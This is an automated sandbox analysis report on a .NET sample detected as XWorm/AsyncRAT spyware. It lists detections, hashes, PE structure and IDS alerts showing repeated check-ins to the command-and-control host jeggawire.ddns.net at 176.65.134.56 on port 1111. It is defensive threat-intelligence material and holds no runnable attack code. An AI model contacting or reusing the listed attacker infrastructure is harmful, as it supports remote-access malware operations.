            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1652322 Sample: 1743362826ccceca1466d461430... Startdate: 30/03/2025 Architecture: WINDOWS Score: 100 10 jeggawire.ddns.net 2->10 14 Suricata IDS alerts for network traffic 2->14 16 Found malware configuration 2->16 18 Malicious sample detected (through community Yara rule) 2->18 22 9 other signatures 2->22 6 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe 2 2->6         started        signatures3 20 Uses dynamic DNS services 10->20 process4 dnsIp5 12 jeggawire.ddns.net 176.65.134.56, 1111, 49682 DIOGELO-ASGB Germany 6->12 24 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 6->24 signatures6

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            No bigger version
            No bigger version
            No bigger version

            windows-stand
            SourceDetectionScannerLabelLink
            1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe75%VirustotalBrowse
            1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe86%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
            1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe100%AviraTR/Spy.Gen
            SAMPLE100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            jeggawire.ddns.net0%Avira URL Cloudsafe

            Download Network PCAP: filteredfull

            NameIPActiveMaliciousAntivirus DetectionReputation
            jeggawire.ddns.net
            176.65.134.56
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              jeggawire.ddns.nettrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                176.65.134.56
                jeggawire.ddns.netGermany
                56325DIOGELO-ASGBtrue
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1652322
                Start date and time:2025-03-30 21:27:22 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 8s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:16
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 4
                • Number of non-executed functions: 1
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 23.204.23.20, 2.23.227.215, 20.190.190.132, 23.57.90.146
                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                TimeTypeDescription
                15:28:16API Interceptor12623857x Sleep call for process: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                176.65.134.561743362767b39ce9ae90af463b2090fcece5c4349a42c3942cf272d75d62dd81aabd676faf123.dat-decoded.exeGet hashmaliciousXWormBrowse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  jeggawire.ddns.net1743362767b39ce9ae90af463b2090fcece5c4349a42c3942cf272d75d62dd81aabd676faf123.dat-decoded.exeGet hashmaliciousXWormBrowse
                  • 176.65.134.56
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  DIOGELO-ASGB1743362767b39ce9ae90af463b2090fcece5c4349a42c3942cf272d75d62dd81aabd676faf123.dat-decoded.exeGet hashmaliciousXWormBrowse
                  • 176.65.134.56
                  SZf8I0IvEg.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                  • 176.65.134.105
                  Z9dgTYzz4x.exeGet hashmaliciousRHADAMANTHYSBrowse
                  • 176.65.134.153
                  killua.x86.elfGet hashmaliciousUnknownBrowse
                  • 176.65.134.43
                  a55fee51fe469b7ed4f23ef3753b380fb548d65f40306962.pptm.ps1Get hashmaliciousRHADAMANTHYSBrowse
                  • 176.65.134.153
                  sparc.nn.elfGet hashmaliciousMiraiBrowse
                  • 176.65.134.15
                  jae1h6e218.exeGet hashmaliciousRHADAMANTHYSBrowse
                  • 176.65.134.145
                  5IY8PW2nOl.exeGet hashmaliciousRHADAMANTHYSBrowse
                  • 176.65.134.145
                  tdm.jsGet hashmaliciousRemcosBrowse
                  • 176.65.134.41
                  morte.x64.elfGet hashmaliciousUnknownBrowse
                  • 176.65.134.62
                  No context
                  No context
                  No created / dropped files found
                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):5.6031175864082945
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  • Win32 Executable (generic) a (10002005/4) 49.75%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Windows Screen Saver (13104/52) 0.07%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  File name:1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
                  File size:36'864 bytes
                  MD5:919d580a19380debbf5159ec58c35562
                  SHA1:6ec5d5f491148e4891666dedbce2f7f5976e59d6
                  SHA256:877cbf41e73553688fed3a860de3bdaf5697a591ae9525469b00242137eaaa15
                  SHA512:40ab34dbf5816807aea748b8d621154cb318cb8314b5ce351561c85bebc5cdad6f5e40024aab7eec6fd0723bdb330dd60be1b1b24aacef3155c56c9666de0890
                  SSDEEP:768:CqQq3QWIdhgbvnUASaKyobFf9kcrOMhe3XPc:CPq3QnbOvUgKyAFf9kcrOMsPc
                  TLSH:3EF24D087B944226D9FD7FF169B371020674E613D913EB9D48E859EE2F277C08E013AA
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q.g............................n.... ........@.. ....................................@................................
                  Icon Hash:90cececece8e8eb0
                  Entrypoint:0x40a56e
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x67E171D6 [Mon Mar 24 14:53:10 2025 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa5140x57.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4f0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x85740x86008e6c775f7b6eeb8ea9afedc883ec5d48False0.5004081156716418data5.737529221071247IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0xc0000x4f00x600c82c95498a964b689627edc80ea5e18fFalse0.3782552083333333data3.754317409647242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0xe0000xc0x200baacbdcb4fc7d641e62fe9f1a5927e77False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_VERSION0xc0a00x25cdata0.4652317880794702
                  RT_MANIFEST0xc3000x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                  DLLImport
                  mscoree.dll_CorExeMain
                  DescriptionData
                  Translation0x0000 0x04b0
                  FileDescription
                  FileVersion1.0.0.0
                  InternalNamejegganewfile.exe
                  LegalCopyright
                  OriginalFilenamejegganewfile.exe
                  ProductVersion1.0.0.0
                  Assembly Version1.0.0.0

                  Download Network PCAP: filteredfull

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2025-03-30T21:28:30.618078+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:28:30.618078+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:28:36.788927+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:28:37.026992+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:28:37.037271+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:28:50.076928+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:28:50.079672+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:28:57.616715+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:28:57.616715+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:03.141015+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:03.143741+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:16.201894+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:16.206043+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:25.297158+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:25.305031+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:27.616448+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:27.616448+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:30.973164+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:31.199153+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:31.199420+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:31.426712+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:41.667276+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:41.671826+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:44.238782+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:44.240550+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:46.559500+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:46.791098+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:46.791192+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:47.083092+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:50.584427+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:50.586100+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:52.485613+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:52.716309+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:52.716415+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:52.993486+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:56.172156+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:29:56.179138+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:56.641580+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:29:57.915595+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:02.673286+02002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:02.900388+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:03.446405+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:03.446534+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:03.668617+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:07.468590+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:07.471577+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:14.659168+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:14.661452+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:15.717930+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:15.720319+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:19.097059+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:19.336909+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:19.337148+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:19.559107+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:23.220897+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:23.222640+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:27.607442+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:27.607442+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:27.947299+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:28.024230+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:29.747415+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:29.749554+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:39.983246+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:39.986702+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:42.541377+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:42.772653+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:42.775637+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:43.058511+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:45.185681+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:45.187364+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:45.672018+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:45.674464+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:49.039359+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:49.045533+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:50.222627+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:50.449491+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:50.449918+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:50.679773+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:53.515036+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:53.517397+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:54.642100+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:54.643756+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:55.975443+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:56.202106+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:56.202178+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:56.661536+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:56.941051+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:57.481385+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:57.483321+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:30:57.713540+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:57.713540+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:59.642080+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:30:59.643915+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:31:01.764395+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:31:01.994939+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
                  2025-03-30T21:31:01.995006+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:31:02.396424+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849682176.65.134.561111TCP
                  2025-03-30T21:31:12.294902+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.65.134.561111192.168.2.849682TCP
